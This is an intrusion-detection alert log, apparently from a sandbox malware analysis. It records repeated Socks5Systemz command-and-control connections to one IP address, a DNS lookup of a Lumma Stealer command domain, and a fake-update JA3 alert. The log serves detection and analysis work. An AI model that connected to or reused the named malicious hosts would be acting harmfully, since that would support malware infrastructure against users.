2024-11-15T14:12:59.846970+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50285	185.208.158.202	80	TCP
2024-11-15T14:12:59.846970+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50285	185.208.158.202	80	TCP
2024-11-15T14:13:00.899388+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50286	185.208.158.202	80	TCP
2024-11-15T14:13:00.899388+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50286	185.208.158.202	80	TCP
2024-11-15T14:13:01.929729+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50288	185.208.158.202	80	TCP
2024-11-15T14:13:01.929729+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50288	185.208.158.202	80	TCP
2024-11-15T14:13:02.974611+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50289	185.208.158.202	80	TCP
2024-11-15T14:13:02.974611+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50289	185.208.158.202	80	TCP
2024-11-15T14:13:04.018581+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50291	185.208.158.202	80	TCP
2024-11-15T14:13:04.018581+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50291	185.208.158.202	80	TCP
2024-11-15T14:13:05.089152+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50293	185.208.158.202	80	TCP
2024-11-15T14:13:05.089152+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50293	185.208.158.202	80	TCP
2024-11-15T14:13:06.136791+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50297	185.208.158.202	80	TCP
2024-11-15T14:13:06.136791+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50297	185.208.158.202	80	TCP
2024-11-15T14:13:07.183416+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50299	185.208.158.202	80	TCP
2024-11-15T14:13:07.183416+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50299	185.208.158.202	80	TCP
2024-11-15T14:13:08.229320+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50301	185.208.158.202	80	TCP
2024-11-15T14:13:08.229320+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50301	185.208.158.202	80	TCP
2024-11-15T14:13:09.276405+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50303	185.208.158.202	80	TCP
2024-11-15T14:13:09.276405+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50303	185.208.158.202	80	TCP
2024-11-15T14:13:10.333101+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50305	185.208.158.202	80	TCP
2024-11-15T14:13:10.333101+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50305	185.208.158.202	80	TCP
2024-11-15T14:13:11.373209+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50306	185.208.158.202	80	TCP
2024-11-15T14:13:11.373209+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50306	185.208.158.202	80	TCP
2024-11-15T14:13:12.422655+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50308	185.208.158.202	80	TCP
2024-11-15T14:13:12.422655+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50308	185.208.158.202	80	TCP
2024-11-15T14:13:13.491599+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50309	185.208.158.202	80	TCP
2024-11-15T14:13:13.491599+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50309	185.208.158.202	80	TCP
2024-11-15T14:13:14.519804+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50311	185.208.158.202	80	TCP
2024-11-15T14:13:14.519804+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50311	185.208.158.202	80	TCP
2024-11-15T14:13:15.559079+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50315	185.208.158.202	80	TCP
2024-11-15T14:13:15.559079+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50315	185.208.158.202	80	TCP
2024-11-15T14:13:16.639836+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50317	185.208.158.202	80	TCP
2024-11-15T14:13:16.639836+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50317	185.208.158.202	80	TCP
2024-11-15T14:13:17.685660+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50318	185.208.158.202	80	TCP
2024-11-15T14:13:17.685660+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50318	185.208.158.202	80	TCP
2024-11-15T14:13:18.716927+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50319	185.208.158.202	80	TCP
2024-11-15T14:13:18.716927+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50319	185.208.158.202	80	TCP
2024-11-15T14:13:19.743109+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50321	185.208.158.202	80	TCP
2024-11-15T14:13:19.743109+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50321	185.208.158.202	80	TCP
2024-11-15T14:13:20.810418+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50322	185.208.158.202	80	TCP
2024-11-15T14:13:20.810418+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50322	185.208.158.202	80	TCP
2024-11-15T14:13:21.863536+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50324	185.208.158.202	80	TCP
2024-11-15T14:13:21.863536+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50324	185.208.158.202	80	TCP
2024-11-15T14:13:22.908176+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50325	185.208.158.202	80	TCP
2024-11-15T14:13:22.908176+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50325	185.208.158.202	80	TCP
2024-11-15T14:13:23.957122+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50326	185.208.158.202	80	TCP
2024-11-15T14:13:23.957122+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50326	185.208.158.202	80	TCP
2024-11-15T14:13:25.409256+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50328	185.208.158.202	80	TCP
2024-11-15T14:13:25.409256+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50328	185.208.158.202	80	TCP
2024-11-15T14:13:26.462165+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50329	185.208.158.202	80	TCP
2024-11-15T14:13:26.462165+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50329	185.208.158.202	80	TCP
2024-11-15T14:13:27.531329+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50331	185.208.158.202	80	TCP
2024-11-15T14:13:27.531329+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50331	185.208.158.202	80	TCP
2024-11-15T14:13:28.563722+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50332	185.208.158.202	80	TCP
2024-11-15T14:13:28.563722+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50332	185.208.158.202	80	TCP
2024-11-15T14:13:29.600461+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50334	185.208.158.202	80	TCP
2024-11-15T14:13:29.600461+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50334	185.208.158.202	80	TCP
2024-11-15T14:13:30.630134+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50335	185.208.158.202	80	TCP
2024-11-15T14:13:30.630134+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50335	185.208.158.202	80	TCP
2024-11-15T14:13:31.665188+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50336	185.208.158.202	80	TCP
2024-11-15T14:13:31.665188+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50336	185.208.158.202	80	TCP
2024-11-15T14:13:32.702612+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50338	185.208.158.202	80	TCP
2024-11-15T14:13:32.702612+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50338	185.208.158.202	80	TCP
2024-11-15T14:13:33.738435+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50339	185.208.158.202	80	TCP
2024-11-15T14:13:33.738435+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50339	185.208.158.202	80	TCP
2024-11-15T14:13:34.784168+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50341	185.208.158.202	80	TCP
2024-11-15T14:13:34.784168+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50341	185.208.158.202	80	TCP
2024-11-15T14:13:35.601870+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	58328	1.1.1.1	53	UDP
2024-11-15T14:13:35.820264+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50342	185.208.158.202	80	TCP
2024-11-15T14:13:35.820264+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50342	185.208.158.202	80	TCP
2024-11-15T14:13:36.862364+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50343	185.208.158.202	80	TCP
2024-11-15T14:13:36.862364+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50343	185.208.158.202	80	TCP
2024-11-15T14:13:37.899410+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50345	185.208.158.202	80	TCP
2024-11-15T14:13:37.899410+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50345	185.208.158.202	80	TCP
2024-11-15T14:13:38.932244+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50346	185.208.158.202	80	TCP
2024-11-15T14:13:38.932244+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50346	185.208.158.202	80	TCP
2024-11-15T14:13:39.993738+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50347	185.208.158.202	80	TCP
2024-11-15T14:13:39.993738+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50347	185.208.158.202	80	TCP
2024-11-15T14:13:41.068024+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50349	185.208.158.202	80	TCP
2024-11-15T14:13:41.068024+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50349	185.208.158.202	80	TCP
2024-11-15T14:13:42.561665+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50351	185.208.158.202	80	TCP
2024-11-15T14:13:42.561665+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50351	185.208.158.202	80	TCP
2024-11-15T14:13:43.621704+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50352	185.208.158.202	80	TCP
2024-11-15T14:13:43.621704+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50352	185.208.158.202	80	TCP
2024-11-15T14:13:44.673400+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50354	185.208.158.202	80	TCP
2024-11-15T14:13:44.673400+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50354	185.208.158.202	80	TCP
2024-11-15T14:13:45.720399+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50355	185.208.158.202	80	TCP
2024-11-15T14:13:45.720399+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50355	185.208.158.202	80	TCP
2024-11-15T14:13:46.749478+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50356	185.208.158.202	80	TCP
2024-11-15T14:13:46.749478+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50356	185.208.158.202	80	TCP
2024-11-15T14:13:47.806924+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50358	185.208.158.202	80	TCP
2024-11-15T14:13:47.806924+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50358	185.208.158.202	80	TCP
2024-11-15T14:13:48.863883+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50359	185.208.158.202	80	TCP
2024-11-15T14:13:48.863883+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50359	185.208.158.202	80	TCP
2024-11-15T14:13:49.904728+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50361	185.208.158.202	80	TCP
2024-11-15T14:13:49.904728+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50361	185.208.158.202	80	TCP
2024-11-15T14:13:50.959178+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50362	185.208.158.202	80	TCP
2024-11-15T14:13:50.959178+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50362	185.208.158.202	80	TCP
2024-11-15T14:13:51.983445+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50364	185.208.158.202	80	TCP
2024-11-15T14:13:51.983445+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50364	185.208.158.202	80	TCP
2024-11-15T14:13:53.019759+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50365	185.208.158.202	80	TCP
2024-11-15T14:13:53.019759+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50365	185.208.158.202	80	TCP
2024-11-15T14:13:54.063931+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50366	185.208.158.202	80	TCP
2024-11-15T14:13:54.063931+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50366	185.208.158.202	80	TCP
2024-11-15T14:13:55.116683+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50368	185.208.158.202	80	TCP
2024-11-15T14:13:55.116683+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50368	185.208.158.202	80	TCP
2024-11-15T14:13:56.139190+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50369	185.208.158.202	80	TCP
2024-11-15T14:13:56.139190+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50369	185.208.158.202	80	TCP
2024-11-15T14:13:56.686209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50370	52.182.141.63	443	TCP
2024-11-15T14:13:57.183444+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50372	185.208.158.202	80	TCP
2024-11-15T14:13:57.183444+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50372	185.208.158.202	80	TCP
2024-11-15T14:13:58.238085+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50373	185.208.158.202	80	TCP
2024-11-15T14:13:58.238085+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50373	185.208.158.202	80	TCP
2024-11-15T14:13:59.285727+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50374	185.208.158.202	80	TCP
2024-11-15T14:13:59.285727+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50374	185.208.158.202	80	TCP
2024-11-15T14:14:00.311949+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50377	185.208.158.202	80	TCP
2024-11-15T14:14:00.311949+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50377	185.208.158.202	80	TCP
2024-11-15T14:14:01.360746+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50378	185.208.158.202	80	TCP
2024-11-15T14:14:01.360746+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50378	185.208.158.202	80	TCP
2024-11-15T14:14:02.398525+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50380	185.208.158.202	80	TCP
2024-11-15T14:14:02.398525+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50380	185.208.158.202	80	TCP
2024-11-15T14:14:03.433188+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50381	185.208.158.202	80	TCP
2024-11-15T14:14:03.433188+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50381	185.208.158.202	80	TCP
2024-11-15T14:14:04.476607+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50383	185.208.158.202	80	TCP
2024-11-15T14:14:04.476607+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50383	185.208.158.202	80	TCP
2024-11-15T14:14:05.503954+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50385	185.208.158.202	80	TCP
2024-11-15T14:14:05.503954+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50385	185.208.158.202	80	TCP
2024-11-15T14:14:06.581792+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50386	185.208.158.202	80	TCP
2024-11-15T14:14:06.581792+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50386	185.208.158.202	80	TCP
2024-11-15T14:14:07.624874+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50388	185.208.158.202	80	TCP
2024-11-15T14:14:07.624874+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50388	185.208.158.202	80	TCP
2024-11-15T14:14:08.970106+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50389	185.208.158.202	80	TCP
2024-11-15T14:14:08.970106+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50389	185.208.158.202	80	TCP
2024-11-15T14:14:10.006389+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50392	185.208.158.202	80	TCP
2024-11-15T14:14:10.006389+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50392	185.208.158.202	80	TCP
2024-11-15T14:14:11.048804+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50393	185.208.158.202	80	TCP
2024-11-15T14:14:11.048804+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50393	185.208.158.202	80	TCP
2024-11-15T14:14:12.129040+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50395	185.208.158.202	80	TCP
2024-11-15T14:14:12.129040+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50395	185.208.158.202	80	TCP
2024-11-15T14:14:13.159067+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50396	185.208.158.202	80	TCP
2024-11-15T14:14:13.159067+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50396	185.208.158.202	80	TCP
2024-11-15T14:14:14.191143+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50397	185.208.158.202	80	TCP
2024-11-15T14:14:14.191143+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50397	185.208.158.202	80	TCP
2024-11-15T14:14:15.234664+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50399	185.208.158.202	80	TCP
2024-11-15T14:14:15.234664+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50399	185.208.158.202	80	TCP
2024-11-15T14:14:16.265507+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50400	185.208.158.202	80	TCP
2024-11-15T14:14:16.265507+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50400	185.208.158.202	80	TCP
2024-11-15T14:14:17.297498+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50402	185.208.158.202	80	TCP
2024-11-15T14:14:17.297498+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50402	185.208.158.202	80	TCP
2024-11-15T14:14:18.385973+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50403	185.208.158.202	80	TCP
2024-11-15T14:14:18.385973+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50403	185.208.158.202	80	TCP
2024-11-15T14:14:19.440542+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50405	185.208.158.202	80	TCP
2024-11-15T14:14:19.440542+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50405	185.208.158.202	80	TCP
2024-11-15T14:14:20.489361+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50407	185.208.158.202	80	TCP
2024-11-15T14:14:20.489361+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50407	185.208.158.202	80	TCP
2024-11-15T14:14:21.561358+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50408	185.208.158.202	80	TCP
2024-11-15T14:14:21.561358+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50408	185.208.158.202	80	TCP
2024-11-15T14:14:22.592532+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50410	185.208.158.202	80	TCP
2024-11-15T14:14:22.592532+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50410	185.208.158.202	80	TCP
2024-11-15T14:14:23.661589+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50411	185.208.158.202	80	TCP
2024-11-15T14:14:23.661589+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50411	185.208.158.202	80	TCP
2024-11-15T14:14:24.697930+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50413	185.208.158.202	80	TCP
2024-11-15T14:14:24.697930+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50413	185.208.158.202	80	TCP
2024-11-15T14:14:25.721830+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50414	185.208.158.202	80	TCP
2024-11-15T14:14:25.721830+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50414	185.208.158.202	80	TCP
2024-11-15T14:14:26.755064+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50415	185.208.158.202	80	TCP
2024-11-15T14:14:26.755064+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50415	185.208.158.202	80	TCP
2024-11-15T14:14:27.809403+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50417	185.208.158.202	80	TCP
2024-11-15T14:14:27.809403+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50417	185.208.158.202	80	TCP
2024-11-15T14:14:28.891512+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50418	185.208.158.202	80	TCP
2024-11-15T14:14:28.891512+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50418	185.208.158.202	80	TCP
